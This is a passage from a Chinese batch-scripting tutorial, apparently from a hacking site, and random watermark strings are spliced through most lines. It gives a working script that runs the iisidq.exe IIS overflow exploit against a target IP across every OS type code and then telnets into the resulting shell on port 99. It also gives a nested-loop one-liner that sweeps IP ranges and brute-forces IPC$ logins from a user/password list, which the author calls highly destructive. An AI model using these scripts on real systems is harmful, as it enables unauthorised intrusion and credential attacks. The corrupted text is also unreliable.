其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 <idq.bat 目标ip>程序如下：★黑基空间★|W5U O!v$e;O
@echo off               /*同例一★黑基空间★#d3e&o@p b
^
if not EXIST iisidq.exe goto file   /*同例一★黑基空间★V4dCFr3_
if %1 == "" goto error         /*同例一★黑基空间★IB5}^,o"kL
ping %1 -n 1 | find "Received = 1"   /*同例一
nF*R(Om'x3`6r0if errorlevel 1 goto error1       /*同例一
#|5xk9_$bToT1{0`0set b=%1       /*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip
1[4i[b,z6I"L0set a=0         /*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。
Q u4\3xocD0:no           /*no段开始★黑基空间★i0l"hHwH+f
if %a%==0 set d=0 /*如果环境变量a=0则创建环境变量d设定环境变量d=0。
8]1mY.rm8Ev0if %a%==1 set d=1 /*环境变量d其实是操作系统类型代码，用计数器来控制其
%e$K1Xw eyMO)G0if %a%==2 set d=2 /*变动。★黑基空间★
`%_G-W0eV
if %a%==3 set d=3★黑基空间★JR d'M WXG0S
if %a%==4 set d=4★黑基空间★@4d._0NVh$d
if %a%==5 set d=5★黑基空间★&Yx0[%^!b+q
if %a%==6 set d=6
8J o7d4OX}4] T0if %a%==7 set d=7
"u{;Ng {0if %a%==9 set d=9
ie&obt!AG0if %a%==10 set d=13★黑基空间★z }P|kb"_4I]T
if %a%==11 set d=14
[HoVv0goto 0           /*变量传递完成后转到标志0处运行★黑基空间★M^)r5X#Z6E!S
:1★黑基空间★UM@X6k
echo 正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候......★黑基空间★c$IJ!sb g1Y
{Ai
:0             /*标志0开始★黑基空间★B4_RV&G
IISIDQ %d% %b% 80 1 99 |find "good" /*按格式发送溢出命令并在结果中发现字符串good（发送代码成功才会有字符串good）
DiJl1PKCf0if errorlevel 1 goto 1         /*如果没有good字符串则没有发送成跳
I.g4Ekn8x f5_0/*转标志1处继续尝试发送
I$].k;a6@WGX?0ping 127.0.0.1 -n 8 >nul       /*ping自己8次相当于延时8秒不显示执★黑基空间★3R#P.t.ty?
/*行结果
*pp[3a,IU#T(FV0echo 正在执行第%d%项!       /*报告正在溢出的操作系统类型
0jy2cs
h:W0telnet %b% 99             /*连接溢出端口★黑基空间★}rF*Jz/Z'~
echo.                 /*显示一个空行★黑基空间★C0GW AR-~~#^
if %d%==14 goto error1   /*如果操作系统类型为14则跳转error1处（循环出口）
%x]3J&MA|u'Z.h#JN0if %d%==13 set a=11         /*开始用计数器对操作系统代码重新附值★黑基空间★*Ox-xp.ICob
if %d%==9 set a=10★黑基空间★
n"z_&F3?/g Iv/A*c
if %d%==7 set a=9

ktg,W ~Jw/u9L0if %d%==6 set a=7★黑基空间★y*[+iB_{_?
if %d%==5 set a=6
gS8L]J,fn2T0if %d%==4 set a=5
ZI1^f_'L0if %d%==3 set a=4
Ri-\$^ }sTND i/lF0if %d%==2 set a=3★黑基空间★!f*nDZ? u%a BP0Y
if %d%==1 set a=2
5qw*}]3Ji {,nMr0if %d%==0 set a=1
B4Z]rPP0goto no                   /*附值完成跳转no段执行
'A zm:Nov7s0:file                     /*以下都是出错后的帮助提示★黑基空间★f["~gS7@+CBc
echo IIsidq.exe没有发现!将该文件和本文件放在同一目录!★黑基空间★Z+SQ8JAx~+@H
goto exit
"w F9_6@r
zurw0:error
+h4SO-Yp5m/G*E
E0echo 错误!目标ip不可识别!请使用下面的格式连接!★黑基空间★n,QC e,FM0T^j"mb
echo idq [目标IP]
-s3j,Ni mErj+I0goto exit
\z@)e0?0:error1★黑基空间★ b t+T5t vc0k'F
echo 连接没有成功!可能目标机器已经修补了该漏洞或者网络故障所至!
4sqF,`5eZS!T#_#t3?/i0echo 请按照下面的格式手工尝试!★黑基空间★ h|&E{2w6Kp U
echo iisidq [目标类型] [目标IP] [目标端口] [连接方式] [溢出端口]★黑基空间★4rOg[{YP
echo telnet [目标ip] [溢出端口]
D.Y6p.M[/Et0:exit                   /*整个程序的出口★黑基空间★,nt4ru*]0m4}
这个批处理采用的整体循环掌握好计数器部分就掌握了这个批处理。★黑基空间★5z M/JO\I;YL
例三★黑基空间★W)O4Q ka6Ua4l
for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f
{0y@IuA0上面的命令为1条命令。大家可以看出该命令使用了4个FOR来套用的。用法为：C:\>TEST.BAT 218 当输入218回车后该命令会由第1个for取初始值0为%%a然后继续取第2个for的初始值0为%%b继续取第3个for的初始值1为%%c最后一个for是将userpass.txt中的第一段字符作为密码%%e第二段字符作为用户名%%f最后执行命令 (这里我把上面的值都带进去，设密码为123 用户名为 abc)★黑基空间★G!yGBy
I#q~x!cj
net usr \\218.0.0.1\ipc$ 123 /u:abc
Q:y\1yT0当然上面这个例子可能有些朋友会说太简单并且太死板不灵活。我把这个例子做了些修改（完整文件见光盘ipc.bat）由兴趣的朋友可以自己看看。修改后的程序可以灵活的查找你指定开始到结束或你指定开始到最大ip的范围。当然功能还可以在加强，至于能加强到什么地步能不能成为一个新的工具那就是你的事了。★黑基空间★0J }#}cyw*g1hq3?
这个的循环动作大了点主要是ip的数字替换麻烦所以没办法。这个批处理我就不写注释了，大家好好的参考上面的内容你会很快看懂这个批处理的。看懂了得不要说简单哦！最起码这是个没有使用任何第三方工具就能探测并保存弱口令的批处理了！！简单的改一改杀伤力还是很大的。以上这些批处理全部在win2000和xp下测试通过最大的优点就是只有一个批处理文件并且绝对不会误报。缺点就是太长！★黑基空间★9Ko Ypf
★黑基空间★+Svh7B&h*rN

?E1A(^,p0后记：
dq`_5DA;LW#~)W0批处理的语法其实很简单，但需要灵活的运用。